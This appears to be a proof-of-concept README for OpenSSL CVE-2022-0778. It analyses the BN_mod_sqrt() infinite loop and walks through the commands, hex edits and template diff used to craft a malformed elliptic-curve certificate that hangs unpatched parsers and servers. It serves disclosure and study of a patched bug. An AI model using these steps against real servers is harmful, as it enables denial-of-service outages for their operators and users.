The discovered vulnerability triggers an infinite loop in the function BN_mod_sqrt()
of OpenSSL while parsing an elliptic curve key. This means that a maliciously crafted X.509 certificate can DoS any unpatched server.
The core of the vulnerability is in the parsing of EC keys with points in compressed format: while parsing this type of keys, OpenSSL will try to expand the compressed point, trying to compute a square root modulo the prime p
over which the curve is defined. However, the primality of p
is checked nowhere, not even in BN_mod_sqrt()
for which it is a requirement; thus, a bug in the implementation will cause an infinite loop due to p
not being prime as expected.
中文版说明可以见我的博客OpenSSL CVE-2022-0778漏洞问题复现与非法证书构造
- Tavis Ormandy for discovering and disclosing the vulnerability
- Drago for publishing the test against
- catbro666 for actually crafting an X.509 certificate that makes the server hang
- wllm-rbnt for the useful asn1template tool
The prerequisite is having installed gcc
and a vulnerable version of OpenSSL.
For the bug in BN_mod_sqrt()
: compile with gcc -o my_bad_sqrt my_bad_sqrt.c -lcrypto
, run ./my_bad_sqrt
and watch it hang forever! :D
With a certificate: run openssl x509 -in certs/ -inform DER -text -noout
on the command line; this also hangs.
The function BN_mod_sqrt()
implements the Tonelli-Shanks algorithm for finding a modular square root, i.e. given an integer a
and a prime number p
, returns a value r
such that r^2 == a (mod p)
Analyzing the commit that patches the vulnerability we see that the culprit is the loop that finds the least index i
for which b^(2^i)==1 (mod p)
, where b
is defined before in the algorithm.
The loop is changed from
i = 1;
if (!BN_mod_sqr(t, b, p, ctx))
goto end;
while (!BN_is_one(t)) {
if (i == e) {
goto end;
if (!BN_mod_mul(t, t, t, p, ctx))
goto end;
for (i = 1; i < e; i++) {
if (i == 1) {
if (!BN_mod_sqr(t, b, p, ctx))
goto end;
} else {
if (!BN_mod_mul(t, t, t, p, ctx))
goto end;
if (BN_is_one(t))
In the second case, there is a for loop limited by the variable e
; in the original code however there is only a check for the case i==e
inside a while loop.
Since these loops are inside a bigger loop that for each iteration sets the new value of e
to the current value of i
, we try the following attack strategy:
- in the first execution of the outer loop, make so that
at the end; for this, we need thatb^2=1 (mod p)
. - in this way, during the second execution we will have
, and if we can get into the inner loop thei==e
check will always fail - if we manage to always have
t != 1 (mod p)
, we will then stay in the loop forever
Notice that the first two steps can actually happen in a "normal" execution, i.e. with a prime p
. However, if p
is composite we can also satisfy the third step!
The Tonelli-Shanks algorithm works by writing p - 1 = 2^e * q
, with an odd q
. This is also the order of the multiplicative group of integers modulo p
, and the values e
and q
will be used many times during the execution; however, if p
is not prime, the order of the multiplicative group will not be p-1
, and this will help us to get into the infinite loop.
In particular, b
is initialized as b = a^q (mod p)
, meaning that if p
was prime, then b
would have order some power of 2
, which we will then find using the loop.
But if we set p = r * s
, the order of the multiplicative group is (r-1)*(s-1) = r*s - r - s + 1
instead of r*s-1
. The algorithm uses the q
value to obtain an element y
of order exactly 2^e
; however, when p
is not prime, the q
value will not have a special meaning for the order, so the element y
will not have order a power of two modulo p=r*s
Since at the end of the first outer loop b
is set to b = b*y^(e-i) (mod p)
, at its second iteration the inner loop will try to find a value i
for which b^(2^i) == 1 (mod p)
, but will fail given that y
is no more guaranteed to have order a power of two.
The numbers in the exploit are very simple: we take r=17,s=41
, which give p=r*s=697
. This means that the computed values of e
and q
will be p-1 = 2^3 * 87
We then pick a=696
, which means that a == -1 (mod p)
and also b == -1 (mod p)
when initialized. This will satisfy step 1 setting e=1
for the following outer loop.
Then b
will be set to an element with order not a power of 2
, and the inner loop will be stuck trying to find and i
for which b^(2^i)==1 (mod p)
OK, now let's craft a dangerous certicate that contains invalid explicit curve paramters with a base point encoded in compressed form.
This section's files are in the certs
First, we need to create a ec private key. Because we want a target cert with explicit curve paramters, so the key also should contain explicit curve paramters.
$ openssl ecparam -out ec.key -name prime256v1 -genkey -noout -param_enc explicit -conv_form compressed
Then, for convenience, we self-signed a cert, and outputed it as DER format.
$ openssl req -new -x509 -key ec.key -out cert.der -outform DER -days 360 -subj "/CN=TEST/"
Let's check the cert info. It contains explicit curve parameters as expected.
$ openssl x509 -in cert.der -text -noout -inform DER
Field Type: prime-field
Generator (compressed):
Now we need to modify the values of these paramters: Prime, A, B, Generator. They satisfy the equation below
where p is the Prime, a is the paramter A, and b is the parameter B. p, a, b together detemine a curve. Uncompressing a point means calculating the Y coordinate from the corresponding X coordinate.
Obviously, modular square root operation should be used, which will call BN_mod_sqrt()
Based on the work of drago-96, we take p=697
, x^3+ax+b=696
. And then we just need to choose appropriate a, b, x which satisfy the second equation. We take x=8
, a=23
, b=0
OK, now we can start to tackle the certificate. Editing the ASN.1 structure manually is really terrible. I used the tool xxd
to tranform the cert into hex format, and then edited it with vim
. After completing editing, tranformed it back with xxd -r
$ cp cert.der cert.der.old
$ xxd cert.der cert.der.hex
$ cp cert.der.hex cert.der.hex.old
$ vim cert.der.hex
# edit cert.der.hex
# ...
# complete
$ xxd -r cert.der.hex
I didn't find a tool more convenient. If anyone knows such a tool, please be generous with your comments.
The steps of crafting are roughly as follows:
- Change the values of Prime、A、B、Generator
- Change Prime into 697, i.e. 0x2b9 in hex
- Change A into 23, i.e. 0x17 in hex
- Change B into 0
- Change the X coordinate of Generator into 8, i.e. 0x020008 (or 0x030008) when encoded with compressed format
- As OpenSSL will check the padding format of
, so the Prime should not contain leading 0-bytes, so we have to change to length of Prime - Similarly, OpenSSL will compare the length of Prime with the length of point string, so the length of X coordinate of Generator should be same as Prime. That's why we set Generator as 030008, but not as 0308.
- Because the ASN.1 structure of cert is nested, all the lengths of external objects should be corrected as well.
- Note there may be an unwanted trailing new-line charater(0x0a) at the end of file after you running
xxd -r
. Eliminate it.
Now, let's have a look at the ASN.1 structure of the normal certificate. The parts marked by red line are to be changed.
$ openssl asn1parse -in cert.der -inform DER -i
The lengths before and after modification are listed as follows:
from(dec) | from(hex) | to(dec) | to(hex) |
549 | 225 | 488 | 1e8 |
460 | 1cc | 399 | 18f |
266 | 10a | 205 | cd |
227 | e3 | 166 | a6 |
215 | d7 | 154 | 9a |
44 | 2c | 13 | 0d |
33 Prime | 21 | 2 | 02 |
33 Generator | 21 | 3 | 03 |
Updated on 2020-03-21:
A much easier way is using the tool asn1template written by wllm-rbnt.
Clone the repo:
$ git clone
Generate a DER template from this certificate:
$ ./asn1template/ cert.der > cert.tpl
Then Change the parameters we just memtioned above:
diff cert.tpl cert_new.tpl
< field32 = FORMAT:HEX,OCTETSTRING:036B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
> field32 = FORMAT:HEX,OCTETSTRING:030008
< field36 = INTEGER:0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
> field36 = INTEGER:0x2B9
< field38 = FORMAT:HEX,OCTETSTRING:5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
> field37 = FORMAT:HEX,OCTETSTRING:0000000000000000000000000000000000000000000000000000000000000017
> field38 = FORMAT:HEX,OCTETSTRING:0000000000000000000000000000000000000000000000000000000000000000
Convert it back to DER encoded ASN1 with ASN1_generate_nconf(3):
$ openssl asn1parse -genconf cert_new.tpl -noout -out cert_new.der
The output cert_new.der
is equivalent to the manually edited version.
So now we have successfully crafted an invalid certificate. Let's see the new ASN.1 structure
$ openssl asn1parse -in -inform DER -i
All the red parts have been modified, and the certificate can be DER-decoded correctly.
Now let's attempt to parse the certificate. The process will get into the infinite loop if everything is as expected.
openssl x509 -in -inform DER -text -noout
As is shown, the %CPU of openssl
process is 100, and the call stack is inside BN_mod_sqrt()
If malicious attacker sends such a crafted certificate when doing SSL handshaking with the server, the server will get into the infinite loop which causes DoS attack.
We will try crafting a certificate using the OpenSSL C libcrypto
As we have seen, we need to use a curve with non-prime base field and encode points in compressed form, so when parsing we will hit the bug in BN_mod_sqrt()
This can be done by setting y^2 = x^3 + 1*x + 694 (mod 697)
as the curve, with (1, 132)
as generator; this will call BN_mod_sqrt()
with the exact same parameters of my_bad_sqrt
Running gcc -o my_bad_group my_bad_group.c -lcrypto && ./my_bad_group
will generate the my_bad_group.der
file which contains the ECparams in DER format.
Trying to parse those params with OpenSSL will result in the infinite loop: openssl ecparam -in my_bad_group.der -inform der
... WIP ...